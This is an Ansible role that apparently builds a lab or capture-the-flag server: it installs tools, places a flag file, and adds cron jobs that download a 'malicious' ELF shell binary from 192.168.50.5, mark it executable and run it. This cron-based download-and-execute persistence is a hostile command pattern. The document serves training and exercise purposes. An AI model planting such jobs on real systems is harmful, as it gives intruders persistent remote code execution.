---
# This is a role for setting up the server.

- name: Install packages
  apt:
    pkg:
     - wget
     - net-tools
     - wine
     - libwine
    update_cache: yes

- name: Place flag
  copy:
    dest: '/home/user/flag.txt'
    owner: 'server'
    content: "Top_Secret_Flag\n"
    mode: '0600'

- name: Create alias for client
  lineinfile:
    path: '/etc/hosts'
    line: '192.168.50.5 client'

- name: Cron job for get malicious file
  cron:
   name: "hack file get"
   minute: "1"
   job: "wget -O /home/user/shell-x64.elf http://192.168.50.5/shell-x64.elf"

- name: Cron job make malicious file executable
  cron:
   name: "hack file executable"
   minute: "2"
   job: "chmod +x /home/user/shell-x64.elf"

- name: Cron job for run malicious file
  cron:
   name: "hack file run"
   minute: "3"
   job: "/home/user/shell-x64.elf"

...
